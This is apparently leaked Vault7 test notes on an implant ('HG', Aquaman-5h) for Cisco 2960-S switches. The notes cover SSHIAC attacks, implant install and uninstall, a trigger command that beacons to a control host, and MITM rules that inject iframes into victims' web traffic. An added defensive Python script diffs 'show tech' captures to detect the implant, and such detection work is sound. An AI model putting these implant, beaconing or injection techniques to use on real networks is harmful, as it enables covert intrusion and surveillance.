Vault7: CIA Hacking Tools Revealed
Owner: User #71467
Aquaman-5h-Without-Snooping Test Notes
Xetron redelivered Aquaman-5h without snooping as an interim solution to EAR 5244. The plan is to run through the smoke tests from previous Aquaman-5h testing and to verify that the bug from EAR 5244 is not reproducible.
Testing Summary
- 2960S crashes and reloads if show stacks is issued during a reinstall of hg (after an initial install with leave_behind and uninstall)
- Confirmed snoop not enabled
Progress / Notes
- Run through HG Base Smoke Tests
  - Install/Uninstall without leave-behind
    - Establish baseline values for clean target device - skipped because we already have that data from previous testing
    - IAC attack - successful, received codes were 125, 60, 159, which are in the readme
      - Edited target-aliases to use target address 172.31.255.14
      - Edited target-aliases to use correct proc_id
    - HG upload - hg_start, left 1s delay between packets
      - HG uploaded successfully - result good
    - Establish CT Session with HG according to readme
      - Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
      - Ran ./prep-ct.sh
      - Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
      - Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
        - 0011.bb89.21c4 is the MAC address of 192.168.21.1
      - Successful HG comms
    - Uninstall according to readme
      - device uninstall_hg -mp -f - Successful
      - Memory back down, no syslog messages, no crash
  - Install/Uninstall with leave-behind
    - Reloaded switch to start with a clean switch
    - SSHIAC attack - successful, received codes were in readme
    - HG upload - hg_start_leave_behind - 1s delay between packets - Successful
    - Collected a show tech
    - Establish CT Session with HG according to readme
      - Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
      - Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
        - 0011.bb89.21c4 is the MAC address of 192.168.21.1
      - Successful HG comms
    - Uninstall according to readme - successful, no anomalies seen
    - Did broad on remote - ok
    - hg_start to reinstall
      - While hg was reinstalling, I typed show stacks on the switch - 1s later the switch crashed with the following error:
        Instruction Access Exception (0x0400)!
        Not sure if this was related to entering show stacks while the hg reinstall was taking place or if that was a coincidence
    - Attempt to reproduce the crash
      - SSHIAC attack
      - Changed interpacket time to 0.1s
      - hg_start_leave_behind - successful
      - Establish CT Session
      - Uninstall according to readme - successful, no anomalies seen
      - hg_start to reinstall
        - No show commands entered - successful reinstall
      - Establish CT Session
      - Uninstall hg - successful
      - SSHIAC attack
      - hg_start_leave_behind to reinstall
        - this time, enter show stacks during install
        - no crashes - output of show stacks does show the artifacts, this is a known issue
      - Could not establish comms - reloading switch and going to try to repeat again
      - Reloaded switch
      - SSHIAC attack
      - hg_start_leave_behind
      - Establish CT session
      - device hg_uninstall -mp -f
      - hg_start_leave_behind - I entered show stacks during install and it crashed again
  - Command and Control
    - Establish CT session and verify versions/capabilities
      - Reload switch to start with clean target
      - SSHIAC attack
      - hg_start
      - Established CT session
      - ilm show - ilm version 3.8.0
      - device get_uid - 1ce85d68a280
      - beacon show - beacon not enabled for this op
      - capability show -v
        - baseline version 3.3.0
        - lists all modules
    - Basic command and control
      - module show - modules running
      - module stop Trigger - success
      - module start Trigger.mod - success
      - ilm refresh - success
      - module show - success - Trigger module running
      - Hit tab key to verify output of available commands
        - mitm present, collect present
      - dns show, web show, https show - startup delay set to 32850k days - no snoop
      - dns get_snooped_host_list_client 0 100 - no snooped hosts even though seeds running
  - Boundary Test
    - Run through list in HG Base Smoke Test Procedure - all failed gracefully, did not attempt to start snoop
  - CI Profile
    - Collect output for comparison - collected output in new files, will compare to previous test output
      - 29.66712 MB more used memory with HG installed
      - Observed the same spikes in CPU during SSHIAC attack, HG upload and SSL handshake as observed in previous testing
      - No change to file system
      - Show tech - observed known show stacks and show controllers artifacts
        - Show tech after hg uninstall - output of show tech platform tcam util asic all has a higher number for one value - IPv4 security aces went from 36 to 284 for ASIC 0 and ASIC 1 - need to test this further
        - Show tech with hg - no output for remote command all show vtp status, whereas there is output without hg and after hg uninstall - need to test this further
      - Added to RANCID and ran once with HG, then uninstalled hg, reloaded switch, and ran RANCID again to compare
        - RANCID rev 1.3 with HG, rev 1.5 without - no differences
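The CI Profile comparison above (a used-memory delta, a TCAM security-ACE count that jumped, a show tech section that went silent while the implant was resident) is exactly the baseline diff a defender can automate across captures from the same device. The following is an added example and not part of these notes or of any tool they describe: the sample captures are constructed in a simplified layout, only the 36 to 284 ACE observation is taken from the notes, and the regexes and "Remote command:" section markers are placeholders to adapt to the real show tech format.

```python
import re
from itertools import takewhile

# Constructed sample "show tech" excerpts in a simplified layout (not real Cisco
# output; adapt the regexes and section markers to the format your device emits).
BASELINE = """\
Remote command: show memory statistics
Processor Pool Total: 87887852 Used: 26543210 Free: 61344642
Remote command: show vtp status
VTP Version capable : 1 to 3
Remote command: show platform tcam utilization asic all
ASIC 0 IPv4 security aces 36
ASIC 1 IPv4 security aces 36
"""
WITH_IMPLANT = """\
Remote command: show memory statistics
Processor Pool Total: 87887852 Used: 57650000 Free: 30237852
Remote command: show vtp status
Remote command: show platform tcam utilization asic all
ASIC 0 IPv4 security aces 284
ASIC 1 IPv4 security aces 284
"""
# Metric name -> regex whose single capture group is the numeric value.
METRICS = {
    "used_memory_bytes": re.compile(r"Used:\s+(\d+)"),
    "asic0_ipv4_security_aces": re.compile(r"ASIC 0 IPv4 security aces\s+(\d+)"),
    "asic1_ipv4_security_aces": re.compile(r"ASIC 1 IPv4 security aces\s+(\d+)"),
}

def extract(text: str) -> dict[str, int]:
    """Pull every known metric out of one capture; missing metrics are skipped."""
    return {n: int(m.group(1)) for n, rx in METRICS.items() if (m := rx.search(text))}

def section_body(text: str, header: str) -> list[str]:
    """Output lines under one 'Remote command:' header, up to the next header."""
    lines = text.splitlines()
    rest = lines[lines.index(header) + 1:] if header in lines else []
    return list(takewhile(lambda l: not l.startswith("Remote command:"), rest))

def missing_sections(baseline: str, current: str) -> list[str]:
    """Sections that produced output in the baseline but are empty in the current capture."""
    headers = [l for l in baseline.splitlines() if l.startswith("Remote command:")]
    return [h for h in headers if section_body(baseline, h) and not section_body(current, h)]

def diff_metrics(baseline: str, current: str, mem_tolerance: int = 1 << 20) -> list[tuple[str, int, int]]:
    """(metric, before, after) for each metric that moved; memory gets a 1 MiB tolerance, counters none."""
    b, c = extract(baseline), extract(current)
    tol = {"used_memory_bytes": mem_tolerance}
    return [(n, b[n], c[n]) for n in b if n in c and abs(c[n] - b[n]) > tol.get(n, 0)]
```

Run it against a clean-device capture and a later capture from the same switch; any counter outside tolerance or any section that went empty is a lead to chase, since the notes show the implant produces no syslog on install or uninstall.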
- SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure
  - Start with a clean, reloaded 2960-S
  - SSHIAC attack and HG install
  - Established CT session
  - Completed module control test - stop, start - did not complete module delete and reload test
  - Did not test module persistence
  - Created SMITE rule
    - Iframe is injected into web page, viewed in source URL
    - Able to attach in Windex and view secrets.txt
  - Deleted mitm rule - iframe no longer injected
- Samsonite Test Case - Uninstall HG and re-attack
  - Reloaded 2960-S to start with a clean target device
  - Attacked with SSHIAC, installed HG and established comms
  - Attempted uninstall hg command device uninstall_hg -mp -f - then typed yes to confirm, result success
  - Checked used memory on the target 2960-S and the memory has gone back down to the normal level without HG installed (may be a slight difference, need to do the math), no syslog messages, no CPU spike
  - Re-attacked using SSHIAC, installed HG, established HG comms - no anomalies
  - Uninstalled HG again using device uninstall_hg -mp -f - no anomalies
    - No syslogs
    - Used memory back to normal
- Samsonite Test Case - Dropped connection during HG install
  - Reloaded 2960-S to start with a clean target device
  - Attacked with SSHIAC
  - Entered hg_start and, after just a few chunks were sent, shut int g1/0/11 via console connection on 2960-S to simulate a network outage
    - ICON-CT reported HG install failed
    - No syslog messages from switch
    - Used memory still shows higher than it should, but not as high as if HG were installed - 27657488 (b)
  - Issued no shut on 2960-S interface g1/0/11 to re-enable the connection
  - Entered hg_start on ICON-CT and HG successfully uploaded - used memory after successful install - 30524888 (b)
- Re-test EAR 5244
  - With HG installed but no CT session established, entered service network restart on Seeds host 10x
    - Did not see err-disable condition
  - Established CT session and entered service network restart on Seeds host 10x
    - Did not see err-disable condition
- Samsonite Test Case - Attempt to install HG when HG already installed
  - Cannot initiate hg_start again via remote - reports comms failure
  - Attempted to re-attack with SSHIAC - seemed to go through normal SSHIAC install process, however at the end of the install, could not establish comms with remote
    - Broad didn't work
    - hg_start fails
  - CT session with HG active throughout
- Samsonite Test Case - Enable MITM attack rule and execute system administrator commands
  - Enabled the SMITE MITM attack rule in HG
  - Performed the following with no anomalies observed
    - Cleared log buffer
    - Disable/re-enable logging
    - Multiple show commands - show vlan, mac-address table, memory, proc cpu, proc cpu hist, log, run
    - Write mem
    - Add/delete a user
    - Add/delete a VLAN
  - Verified that SMITE works by web browsing from Victim VM - collected output from Wireshark running on Victim VM which shows the Iframe
- Samsonite Test Case - Issue Cisco "test crash" command to test crash and generate a crashinfo
  - With HG installed, issued test crash and selected reason as software forced crash
    - Saved output of crashinfo file
    - Saved log messages seen upon reboot of switch in log buffer
    - Memory used had returned to normal levels for no HG
  - Without HG installed, repeated test crash - need to compare crashinfo
    - Reloaded 2960-S to remove HG
    - Issued "test crash" command with software forced crash as reason
    - Saved output of crashinfo file
    - Saved syslog messages seen upon reboot of switch in log buffer - log messages are the same as seen on test crash with HG